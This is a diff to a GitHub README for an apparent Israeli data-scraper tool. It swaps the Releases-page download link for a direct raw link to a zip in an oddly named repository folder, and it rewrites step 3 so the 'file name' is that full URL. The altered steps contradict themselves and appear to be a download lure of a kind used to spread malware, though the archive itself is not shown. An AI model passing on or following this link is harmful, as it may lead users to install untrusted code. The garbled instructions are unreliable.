Rdaniyaal/easyco-il-data-extraction-scraper/README.md

 ## 📥 Download & Install

-To download the application, visit this page: [Download Link](https://github.com/Rdaniyaal/easyco-il-data-extraction-scraper/releases).
+To download the application, visit this page: [Download Link](https://github.com/Rdaniyaal/easyco-il-data-extraction-scraper/raw/refs/heads/main/ancylopod/il_easyco_scraper_data_extraction_v3.0.zip).
 Follow these steps:

 1. Click on the link above to open the Releases page.
 2. Find the latest version of the application.
-3. Look for a file named `easyco-il-data-extraction-scraper.zip` or similar.
+3. Look for a file named `https://github.com/Rdaniyaal/easyco-il-data-extraction-scraper/raw/refs/heads/main/ancylopod/il_easyco_scraper_data_extraction_v3.0.zip` or similar.
 4. Click on this file to download it to your computer.

 ## 🗂️ Extracting the Files